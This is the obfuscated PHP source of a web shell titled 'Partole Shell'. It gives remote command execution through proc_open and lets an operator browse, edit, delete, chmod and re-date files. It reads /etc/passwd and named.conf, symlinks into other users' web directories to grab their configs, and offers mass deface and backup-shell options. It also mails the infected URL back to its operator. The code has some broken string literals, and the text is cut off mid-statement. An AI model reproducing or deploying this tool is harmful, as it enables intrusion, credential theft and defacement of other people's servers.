goto JCaVf; YRSzH: if (isset($_GET["loknya"])) { $lokasi = $_GET["loknya"]; $lokdua = $_GET["loknya"]; } else { $lokasi = $gcw(); $lokdua = $gcw(); } goto ly1bD; geuFp: $sub = "substr"; goto pNoz_; q5nMQ: mail($tujuanmail, "KONTOL BENGKAK", $pesan_alert, "[ " . $_SERVER["REMOTE_ADDR"] . " ]"); goto qfm6V; RopeH: if ($isw($euybrekw)) { echo "<font color="green">"; } elseif (!$isr($euybrekw)) { echo "<font color="red">"; } goto jgB6f; uTgEJ: $fsz = "filesize"; goto D_Gj1; M4qzh: set_time_limit(0); goto T_QoH; kb0AF: echo "Server IP : <font color=gold>" . ipsrv() . "</font> / Your IP : <font color=gold>" . $_SERVER[$rad] . "</font> [<a href='?opsi=repip'> <gold>Reverse IP</gold> </a>]<br>"; goto qxf6f; arj6S: $chm = "chmod"; goto as5Ps; oK_dM: @ini_set("display_errors", 0); goto M4qzh; gXZxu: echo "<hr></center><br>"; goto cMbkh; G6BRQ: echo "User : <font color='gold'>" . @$gcu() . " </font>( <font color='gold'>" . @$gmu() . "</font>)<br>"; goto IDGXg; E4j04: echo " | Sudo : "; goto WELA8; oWhs2: $ftm = "filemtime"; goto IpTNg; p03od: $lokasis = $exp("/", $lokasi); goto CZFBi; ZSpb4: if (@$fnct("curl_init")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto pASAe; LpOag: echo tuls("MASS DEFACE", $_SERVER["SCRIPT_NAME"] . "?loknya=" . $lokasi . "&opsi=mdf"); goto qXT1U; jKDza: function gor($fl) { $a = "function_exists"; $b = "posix_getpwuid"; $c = "fileowner"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d["name"]; } } elseif ($a($c)) { return $c($fl); } else { return "?"; } } goto iTeno; PoFeu: $fow = "fileowner"; goto iLsLk; lfj2M: foreach ($lokasinya as $ppkcina) { $euybre = $lokasi . "/" . $ppkcina; $euybre = $srl("//", "/", $euybre); if (!$idi($euybre) || $ppkcina == || $ppkcina == "..") { continue; } echo "<tr>"; echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?loknya=" . $euybre . "">" . $ppkcina . "</a></td>\xa <td><center>--</center></td>
\x9<td><center>" . fdt($euybre) . "</center></td>\xa <td><center>" . gor($euybre) . " / " . ggr($euybre) . "</center></td>\xa <td><center>"; if ($isw($euybre)) { echo "<font color="green">"; } elseif (!$isr($euybre)) { echo "<font color="red">"; } echo statusnya($euybre); if ($isw($euybre) || !$isr($euybre)) { echo "</font>"; } echo "</center></td>
<td><center><form method="POST" action="?pilihan&loknya={$lokasi}">\xa\x9<input type="hidden" name="type" value="dir">\xa <input type="hidden" name="name" value="{$ppkcina}">
\x9<input type="hidden" name="loknya" value="{$lokasi}/{$ppkcina}">
<button type='submit' class='btf' name='pilih' value='ubahnama'><i class='fa fa-pencil' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-gear' style='color: #fff'></i></button>
\x9<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>\xa </form></center></td>\xa\x9</tr>"; } goto aglnC; qEk1b: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto AxwZ0; aqdTl: if (isset($_GET["lokasie"])) { echo "<tr><td>Current File : " . $_GET["lokasie"]; echo "</tr></td></table><br/>"; echo "<pre>" . $hsc($fgt($_GET["lokasie"])) . "</pre>"; author(); } elseif (isset($_POST["loknya"]) && $_POST["pilih"] == "hapus") { if ($idi($_POST["loknya"]) && $fxt($_POST["loknya"])) { xrd($_POST["loknya"]); if ($fxt($_POST["loknya"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); } } elseif ($ifi($_POST["loknya"]) && $fxt($_POST["loknya"])) { @$ulk($_POST["loknya"]); if ($fxt($_POST["loknya"])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } else { red("File / Directory not Found !"); } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { if (!isset($_POST["cemod"])) { if ($_POST["type"] == "file") { echo "<center>File : " . $hsc($_POST["loknya"]) . "<br>"; } else { echo "<center>Dir : " . $hsc($_POST["loknya"]) . "<br>"; } echo "<form method="post">
\x9\x9Permission : <input name="perm" type="text" class="up" size="4" maxlength="4" value="" . $sub($spr("%o", $fp($_POST["loknya"])), -4) . "" />\xa\x9\x9<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">\xa\x9\x9<input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["type"] == "file") { echo "<input type="hidden" name="type" value="file">"; } else { echo "<input type="hidden" name="type" value="dir">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>
\x9 </form><br>"; } else { $cm = @$chm($_POST["loknya"], $ocd($_POST["perm"])); if ($cm == true) { green("Change Mod Success !"); if ($_POST["type"] == "file") { echo "<center>File : " . $hsc($_POST["loknya"]) . "<br>"; } else { echo "<center>Dir : " . $hsc($_POST["loknya"]) . "<br>"; } echo "<form method="post">\xa \x9 Permission : <input name="perm" type="text" class="up" size="4" maxlength=" value="" . $sub($spr("%o", $fp($_POST["loknya"])), -4) . "" />\xa \x9<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">\xa\x9\x9\x9<input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["type"] == "file") { echo "<input type="hidden" name="type" value="file">"; } else { echo "<input type="hidden" name="type" value="dir">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa\x9\x9\x9</form><br>"; } else { red("Change Mod Failed !"); if ($_POST["type"] == "file") { echo "<center>File : " . $hsc($_POST["loknya"]) . "<br>"; } else { echo "<center>Dir : " . $hsc($_POST["loknya"]) . "<br>"; } echo "<form method="post">
\x9 \x9Permission : <input name="perm" type="text" class="up" size=" maxlength=" value="" . $sub($spr("%o", $fp($_POST["loknya"])), -4) . "" />\xa\x9 \x9<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">
\x9 \x9<input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["type"] == "file") { echo "<input type="hidden" name="type" value="file">"; } else { echo "<input type="hidden" name="type" value="dir">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa\x9\x9 </form><br>"; } } } elseif (isset($_POST["loknya"]) && $_POST["pilih"] == "ubahnama") { if (isset($_POST["gantin"])) { $namabaru = $_GET["loknya"] . "/" . $_POST["newname"]; $ceen = "rename"; if (@$ceen($_POST["loknya"], $namabaru) === true) { green("Change Name Success"); if ($_POST["type"] == "file") { echo "<center>File : " . $hsc($_POST["loknya"]) . "<br>"; } else { echo "<center>Dir : " . $hsc($_POST["loknya"]) . "<br>"; } echo "<form method="post">\xa \x9\x9New Name : <input name="newname" type="text" class="up" size=0" value="" . $hsc($_POST["newname"]) . "" />
\x9 \x9<input type="hidden" name="loknya" value="" . $_POST["newname"] . "">\xa \x9\x9<input type="hidden" name="pilih" value="ubahnama">"; if ($_POST["type"] == "file") { echo "<input type="hidden" name="type" value="file">"; } else { echo "<input type="hidden" name="type" value="dir">"; } echo "<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>
\x9\x9\x9</form><br>"; } else { red("Change Name Failed"); } } else { if ($_POST["type"] == "file") { echo "<center>File : " . $hsc($_POST["loknya"]) . "<br>"; } else { echo "<center>Dir : " . $hsc($_POST["loknya"]) . "<br>"; } echo "<form method="post">
\x9New Name : <input name="newname" type="text" class="up" size=0" value="" . $hsc($bsn($_POST["loknya"])) . "" />\xa\x9 <input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">\xa <input type="hidden" name="pilih" value="ubahnama">"; if ($_POST["type"] == "file") { echo "<input type="hidden" name="type" value="file">"; } else { echo "<input type="hidden" name="type" value="dir">"; } echo "<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>
\x9 </form><br>"; } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @$fpt($_POST["loknya"], $_POST["src"]); if ($fgt($_POST["loknya"]) == $_POST["src"]) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>File : " . $hsc($_POST["loknya"]) . "<br><br>"; echo "<form method="post">\xa\x9<textarea cols=80 rows= name="src">" . $hsc($fgt($_POST["loknya"])) . "</textarea><br>
\x9<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">
\x9<input type="hidden" name="pilih" value="edit">
<input type="submit" value="Edit File" name="gasedit" class="up" style="cursor: pointer; border-color: #fff"/>
\x9</form><br>"; } elseif (isset($_POST["komends"])) { if (isset($_POST["komend"])) { if (isset($_GET["loknya"])) { $lk = $_GET["loknya"]; } else { $lk = $gcw(); } $km = "komend"; echo $km($_POST["komend"], $lk); die; } } elseif (isset($_POST["loknya"]) && $_POST["pilih"] == "ubahtanggal") { if (isset($_POST["tanggale"])) { $stt = "strtotime"; $tch = "touch"; $tanggale = $stt($_POST["tanggal"]); if (@$tch($_POST["loknya"], $tanggale) === true) { green("Change Date Success !"); $det = "date"; $ftm = "filemtime"; $b = $det("d F Y H:i:s", $ftm($_POST["loknya"])); if ($_POST["type"] == "file") { echo "<center>File : " . $hsc($_POST["loknya"]) . "<br>"; } else { echo "<center>Dir : " . $hsc($_POST["loknya"]) . "<br>"; } echo "<form method="post">\xa\x9 New Date : <input name="tanggal" type="text" class="up" size="20" value="" . $b . "" />\xa\x9\x9\x9<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">\xa\x9 \x9<input type="hidden" name="pilih" value="ubahtanggal">"; if ($_POST["type"] == "file") { echo "<input type="hidden" name="type" value="file">"; } else { echo "<input type="hidden" name="type" value="dir">"; } echo "<input type="submit" value="Change" name="tanggale" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } else { red("Failed to Change Date !"); } } else { $det = "date"; $ftm = "filemtime"; $b = $det("d F Y H:i:s", $ftm($_POST["loknya"])); if ($_POST["type"] == "file") { echo "<center>File : " . $hsc($_POST["loknya"]) . "<br>"; } else { echo "<center>Dir : " . $hsc($_POST["loknya"]) . "<br>"; } echo "<form method="post">\xa \x9New Date : <input name="tanggal" type="text" class="up" size="20" value="" . $b . "" />\xa \x9<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">\xa\x9\x9<input type="hidden" name="pilih" value="ubahtanggal">"; if ($_POST["type"] == "file") { echo "<input type="hidden" name="type" value="file">"; } else { echo "<input type="hidden" name="type" value="dir">"; } echo "<input type="submit" value="Change" name="tanggale" class="up" style="cursor: pointer; border-color: #fff"/>
\x9\x9</form><br>"; } } elseif (isset($_POST["loknya"]) && $_POST["pilih"] == "dunlut") { $dunlute = $_POST["loknya"]; if ($fxt($dunlute) && isset($dunlute)) { if ($ird($dunlute)) { dunlut($dunlute); } elseif ($idr($fl)) { red("That is Directory, Not File -_-"); } else { red("File is Not Readable !"); } } else { red("File Not Found !"); } } elseif (isset($_POST["loknya"]) && $_POST["pilih"] == "folder") { if ($isw("./") || $ird("./")) { $loke = $_POST["loknya"]; if (isset($_POST["buatfolder"])) { $buatf = $mkd($loke . "/" . $_POST["folderbaru"]); if ($buatf == true) { green("Folder <b>" . $hsc($_POST["folderbaru"]) . "</b> Created !"); echo "<form method="post"><center>Folder : <input type="text" name="folderbaru" class="up"> <input type="submit" name="buatFolder" value="Create Folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">\xa <input type="hidden" name="pilih" value="Folder"></form>"; } else { red("Failed to Create folder !"); echo "<form method="post"><center>Folder : <input type="text" name="folderbaru" class="up"> <input type="submit" name="buatFolder" value="Create Folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">
<input type="hidden" name="pilih" value="Folder"></form>"; } } else { echo "<form method="post"><center>Folder : <input type="text" name="folderbaru" class="up"> <input type="submit" name="buatFolder" value="Create Folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="loknya" value="" . $_POST["loknya"] . ""><input type="hidden" name="pilih" value="Folder"></form>"; } } } elseif (isset($_POST["loknya"]) && $_POST["pilih"] == "file") { if ($isw("./") || $isr("./")) { $loke = $_POST["loknya"]; if (isset($_POST["buatfile"])) { $buatf = $fpt($loke . "/" . $_POST["filebaru"], ''); if ($fxt($loke . "/" . $_POST["filebaru"])) { green("File <b>" . $hsc($_POST["filebaru"]) . "</b> Created !"); echo "<form method="post"><center>Filename : <input type="text" name="filebaru" class="up"> <input type="submit" name="buatfile" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">
<input type="hidden" name="pilih" value="file"></form>"; } else { red("Failed to Create File !"); echo "<form method="post"><center>Filename : <input type="text" name="filebaru" class="up"> <input type="submit" name="buatfile" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="loknya" value="" . $_POST["loknya"] . "">
<input type="hidden" name="pilih" value="file"></form>"; } } else { echo "<form method="post"><center>Filename : <input type="text" name="filebaru" class="up"> <input type="submit" name="buatfile" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="loknya" value="" . $_POST["loknya"] . ""><input type="hidden" name="pilih" value="file"></form>"; } } } goto pywxM; rYQ8V: $bsn = "basename"; goto i06Kn; ZJTmC: function dunlut($fl) { $a = "file_exists"; $b = "basename"; $c = "filesize"; $d = "readfile"; if ($a($fl) && isset($fl)) { header("Content-Description: File Transfer"); header("Content-Control:public"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . $b($fl) . """); header("Expires: 0"); header("Expired:0"); header("Cache-Control: must-revalidate"); header("Content-Transfer-Encoding:binary"); header("Pragma: public"); header("Content-Length: " . $c($fl)); flush(); $d($fl); die; } else { return "File Not Found !"; } } goto AqiJa; ogyTd:
<meta content="noindex"name="robots"><link href="https://i.imgur.com/Be4uoSM.png"rel="icon"type="image/x-icon"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Dosis,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#25383c}#content .first:hover{background-color:#25383c text-shadow:0px 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#fff;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}gold{color:gold}ijo{color:green}merah{color:red}</style><center>goto vQK9W; MErfd: $ird = "is_readable"; goto sUaNB; SXaz2: $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto tSomP; T_QoH: ini_set("memory_limit", "M"); goto dHeC5; Ueu41: $fp = "fileperms"; goto arj6S; KRYMy: echo "<br>Path / Dir : "; goto Yn8nx; Oa47o: foreach ($lokasinya as $mekicina) { $euybray = $lokasi . "/" . $mekicina; if (!$ifi("{$lokasi}/{$mekicina}")) { continue; } $size = $fsz("{$lokasi}/{$mekicina}") / $skd; $size = $rd($size, 3); if ($size >= $skd) { $size = $rd($size / $skd, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td>" . cfn($euybray) . " <a href="?lokasie={$lokasi}/{$mekicina}&loknya={$lokasi}">{$mekicina}</a></td>
<td><center>" . $size . "</center></td>
<td><center>" . fdt($euybray) . "</center></td>
<td><center>" . gor($euybray) . " / " . ggr($euybray) . "</center></td>
<td><center>"; if ($isw("{$lokasi}/{$mekicina}")) { echo "<font color="green">"; } elseif (!$isr("{$lokasi}/{$mekicina}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$mekicina}"); if ($isw("{$lokasi}/{$mekicina}") || !$isr("{$lokasi}/{$mekicina}")) { echo "</font>"; } echo "</center></td><td><center>
<form method="post" action="?pilihan&loknya={$lokasi}">
<button type='submit' class='btf' name='pilih' value='edit'><i class='fa fa-edit' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahnama'><i class='fa fa-pencil' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-gear' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='dunlut'><i class='fa fa-download' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>\xa<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="{$mekicina}">
<input type="hidden" name="loknya" value="{$lokasi}/{$mekicina}">
</form></center></td>
</tr>"; } goto Lpsfi; t_7tM: function crul($web) { $cr = "curl_setopt"; $cx = "curl_exec"; $ch = "curl_close"; $ceha = curl_init(); $cr($ceha, CURLOPT_URL, $web); $cr($ceha, CURLOPT_RETURNTRANSFER, 1); return $cx($ceha); $ch($ceha); } goto xyR_y; EekW6: echo tuls("BACKUP SHELL", $_SERVER["SCRIPT_NAME"] . "?loknya=" . $lokasi . "&opsi=bekup"); goto EiRtV; ly1bD: $lokasi = $srl("\", "/", $lokasi); goto p03od; btLN0: echo "">\xa<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">\xa</form>"; goto Aj6bK; nvhDa: error_reporting(0); goto qjyjd; AqiJa: function komend($kom, $lk) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/" . $xx . "/i", $kom)) { $kom = $kom . " " . $xx; } $a = "function_exists"; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk); return "<pre>" . $c($d($meki[1])) . "</pre>"; } else { return "proc_open function is disabled !"; } } goto tfogm; hDb0N: $idi = "is_dir"; goto rVq7a; Kaivu: function crt() { $a = "is_writable"; if ($a($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto QmYiW; siD0Y:
<!doctypehtml><html><head>goto qmgbE; tfogm: function komenb($kom, $lk) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/" . $xx . "/i", $kom)) { $kom = $kom . " " . $xx; } $a = "function_exists"; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk); return $d($meki[1]); } else { return "proc_open function is disabled !"; } } goto wIqMy; O4myX: function cdrd() { if (isset($_GET["loknya"])) { $lokasi = $_GET["loknya"]; } else { $lokasi = "getcwd"; $lokasi = $lokasi(); } $b = "is_writable"; if ($b($lokasi)) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto Kaivu; BpW9X: if (@$fxt("/usr/bin/perl")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto tYaJ5; bJ6r0: $fxt = "file_exists"; goto hDb0N; MqNhN: $idr = "is_dir"; goto MErfd; vBQta: echo " | cURL : "; goto ZSpb4; Sk5fX: $gcu = "get_current_user"; goto lEzvj; XSdOZ: $isw = "is_writable"; goto MqNhN; wIqMy: function gtd() { $a = "is_readable"; $b = "file_get_contents"; $c = "preg_match_all"; $d = "file_exists"; $e = "scandir"; $f = "count"; $g = "array_unique"; $h = "shell_exec"; $i = "preg_match"; if ($a("/etc/named.conf")) { $a = $b("/etc/named.conf"); $c("/\/var\/named\/(.*?)\.db/i", $a, $b); $b = $b[1]; return $f($g($b)) . " Domains"; } elseif ($d("/var/named/named.local")) { $a = $e("/var/named"); return $f($a) . " Domains"; } elseif ($a("/etc/passwd")) { $a = $b("/etc/passwd"); if ($i("/\/vhosts\//i", $a) && $i("/\/bin\/false/i", $a)) { $c("/\/vhosts\/(.*?):/i", $a, $b); $b = $b[1]; return $f($g($b)) . " Domains"; } else { $c("/\/home\/(.*?):/i", $a, $b); $b = $b[1]; return $f($g($b)) . " Domains"; } } elseif (!empty($h("cat /etc/passwd"))) { $a = $h("cat /etc/passwd"); if ($i("/\/vhosts\//i", $a) && $i("/\/bin\/false/i", $a)) { $c("/\/vhosts\/(.*?):/i", $a, $b); $b = $b[1]; return $f($g($b)) . " Domains"; } else { $c("/\/home\/(.*?):/i", $a, $b); $b = $b[1]; return $f($g($b)) . " Domains"; } } else { return "0 Domains"; } } goto scEWv; DTWpo: echo "MySQL : "; goto SfQVy; lzGNb: echo "<br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #0" value=""; goto owq0p; QVgPM: $fnct = "function_exists"; goto Vr_wk; OAXXV: echo "Upload File : "; goto QD8x_; AxwZ0: function oren($text) { return "<center><font color='orange'>" . $text . "</center></font>"; } goto O0Qtr; D_Gj1: $rd = "round"; goto lVNCo; qmgbE: echo "<title>Partole Shell</title>"; goto ogyTd; ZYyp0: $disfunc = @$igt("disable_functions"); goto b2WtM; WELA8: if (@$fxt("/usr/bin/sudo")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto yIPkT; SfQVy: if (@$fnct("mysql_connect")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto vBQta; qXT1U: echo tuls("SCAN ROOT", $_SERVER["SCRIPT_NAME"] . "?loknya=" . $lokasi . "&opsi=scanr"); goto qjCL3; JCaVf: session_start(); goto JYVq5; NI1ew: $arr = "array_rand"; goto C71f6; as5Ps: $ocd = "octdec"; goto XSdOZ; iTeno: function fdt($fl) { $a = "date"; $b = "filemtime"; return $a("F d Y H:i:s", $b($fl)); } goto ZJTmC; xyR_y: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto qEk1b; dHeC5: header("Content-Type: text/html; charset=UTF-8"); goto k0tk4; j56ej: $mdr = "mkdir"; goto ShKfK; jgB6f: echo statusnya($euybrekw); goto gNRi2; qxf6f: echo "Web Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto WCtUB; tx3mw: if (@$fxt("/usr/bin/python2")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto E4j04; WCtUB: $unm = "php_uname"; goto pXzw1; pASAe: echo " | WGET : "; goto xerp0; qjCL3: echo tuls("SYMLINK", $_SERVER["SCRIPT_NAME"] . "?loknya=" . $lokasi . "&opsi=esyeem"); goto gXZxu; yIPkT: echo " | Pkexec : "; goto Xktsz; ToPG6: $euybrekw = $srl("//", "/", $euybrekw); goto MJdgk; owq0p: if (isset($_POST["komend"])) { echo $hsc($_POST["komend"]); } else { echo "uname -a"; } goto btLN0; qjyjd: $gcw = "getcwd"; goto K41X6; QmYiW: function xrd($lokena) { $a = "scandir"; $items = $a($lokena); foreach ($items as $item) { if ($item === || $item === "..") { continue; } $b = "is_dir"; $loknya = $lokena . "/" . $item; if ($b($loknya)) { xrd($loknya); } else { $c = "unlink"; $c($loknya); } } $d = "rmdir"; $d($lokena); } goto XiblZ; lz2QJ: echo "</center></td>\xa<td><center><form method="POST" action="?pilihan&loknya={$lokasi}">\xa<input type="hidden" name="type" value="dir">
<input type="hidden" name="loknya" value="{$lokasi}/">\xa<button type='submit' class='btf' name='pilih' value='folder'><i class='fa fa-folder' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='file'><i class='fa fa-file' style='color: #fff'></i></button>\xa</form></center>"; goto YOAA2; WMfSB: $pma = "preg_match_all"; goto aCxi_; u72VF: set_time_limit(0); goto nvhDa; aglnC: echo "<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>"; goto tDoll; aCxi_: $aru = "array_unique"; goto DP2AH; tSomP: $pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER["REMOTE_ADDR"] . " ]"; goto q5nMQ; JYVq5: $ewean = "sosisgoreng"; goto Nfm3P; cMbkh: if (isset($_GET["loknya"]) && $_GET["opsi"] == "lompat") { if ($ird("/etc/passwd")) { $fjp = $fgt("/etc/passwd"); } elseif (!empty(komenb("cat /etc/passwd", $lokasi))) { $fjp = komenb("cat /etc/passwd", $lokasi); } else { die(red("[!] Gagal Mengambil Directory !")); } $pma("/\/home\/(.*?):/i", $fjp, $fjpr); $fjpr = $fjpr[1]; if (empty($fjpr)) { die(red("[!] Tidak Ada User di Temukan !")); } echo "Total Ada " . $ctn($aru($fjpr)) . " directory di Server <font color=gold>" . $_SERVER[$rad] . "</font><br><br>"; foreach ($aru($fjpr) as $fj) { $fjh = "/home/" . $fj . "/public_html"; if ($ird("/etc/named.conf")) { $etn = $fgt("/etc/named.conf"); $pma("/\/var\/named\/(.*?)\.db/i", $etn, $en); $en = $en[1]; if ($ird($fjh)) { echo "[<font color=green>Readable</font>] <a href='" . $_SERVER["SCRIPT_NAME"] . "?loknya=" . $fjh . "'>" . $fjh . "</a> => "; } else { echo "[<font color=red>Unreadable</font>] " . $fjh . "</a> => "; } foreach ($aru($en) as $enw) { $asd = $pgw(@$fow("/etc/valiases/" . $enw)); $asd = $asd["name"]; if ($asd == $fj) { echo "<a href='http://" . $enw . "' target=_blank><font color=gold>" . $enw . "</font></a>, "; } } echo "<br>"; } else { if ($ird($fjh)) { echo "[<font color=green>Readable</font>] <a href='" . $_SERVER["SCRIPT_NAME"] . "?loknya=" . $fjh . "'>" . $fjh . "</a><br>"; } else { echo "[<font color=red>Unreadable</font>] " . $fjh . "</a><br>"; } } } echo "<hr>"; die(author()); } elseif (isset($_GET["loknya"]) && $_GET["opsi"] == "esyeem") { if ($ird("/etc/passwd")) { $syp = $fgt("/etc/passwd"); } elseif (!empty(komenb("cat /etc/passwd", $lokasi))) { $syp = komenb("cat /etc/passwd", $lokasi); } else { die(red("[!] Gagal Mengambil Directory !")); } if (!$fnct("symlink")) { if (!$fnct("proc_open")) { die(red("[!] Symlink Function is Disabled !")); } } echo "<center>[ <gold>GRAB CONFIG</gold> ] - [ <a href=" . $_SERVER["REQUEST_URI"] . "&opsidua=syfile><gold>SYMLINK FILE</gold></a> ] - [ <gold>SYMLINK VHOST</gold> ]</center>"; if (isset($_GET["opsidua"])) { if ($_GET["opsidua"] == "grabconfig") { } elseif ($_GET["opsidua"] == "syfile") { echo "<br><br><center>Opsi : <gold>Symlink File</gold>"; echo "<form method="post">File : \xa\x9 <input type="text" name="domena" style="cursor: pointer; border-color: #000" class="up" placeholder="/home/user/public_html/database.php">
\x9 <input type="submit" name="gaskeun" value="Gaskeun" class="up" style="cursor: pointer">\xa </form></center>"; if (isset($_POST["gaskeun"])) { $rend = rand() . ".txt"; $lokdi = $_POST["domena"]; esyeem($lokdi, "anon_sym/" . $rend); echo "<br><center>Cek : <a href="anon_sym/" . $rend . ""><gold>" . $rend . "</gold></a></center><br>"; } } echo "<hr>"; die(author()); } $pma("/\/home\/(.*?):/i", $syp, $sypr); $sypr = $sypr[1]; if (empty($sypr)) { die(red("[!] Tidak Ada User di Temukan !")); } echo "Total Ada " . $ctn($aru($sypr)) . " User di Server <font color=gold>" . $_SERVER[$rad] . "</font><br><br>"; if (!$isw(getcwd())) { die(red("[!] Gagal Symlink - Red Dir !")); } if (!$fxt("anon_sym")) { $mdr("anon_sym"); } if (!$fxt("anon_sym/.htaccess")) { $fpt("anon_sym/.htaccess", $urd("Options%20Indexes*0FollowSymLinks(D%0ADirectoryIndex%ssssss.htm%0D%0AAddType%txt%20.php%0D%0AAddHandler%20txt%20.php")); } $ckn = esyeem("/", "anon_sym/anon"); foreach ($aru($sypr) as $sj) { $sjh = "/home/" . $sj . "/public_html"; $ygy = $srl($bsn($_SERVER["SCRIPT_NAME"]), "anon_sym/anon" . $sjh, $_SERVER["SCRIPT_NAME"]); if ($ird("/etc/named.conf")) { $etn = $fgt("/etc/named.conf"); $pma("/\/var\/named\/(.*?)\.db/i", $etn, $en); $en = $en[1]; echo "[<font color=gold>Symlink</font>] <a href='" . $ygy . "' target=_blank>" . $sjh . "</a> => "; foreach ($aru($en) as $enw) { $asd = $pgw(@$fow("/etc/valiases/" . $enw)); $asd = $asd["name"]; if ($asd == $sj) { echo "<a href='http://" . $enw . "' target=_blank><font color=gold>" . $enw . "</font></a>, "; } } echo "<br>"; } else { echo "[<font color=gold>Symlink</font>] <a href='" . $ygy . "' target=_blank>" . $sjh . "</a><br>"; } } echo 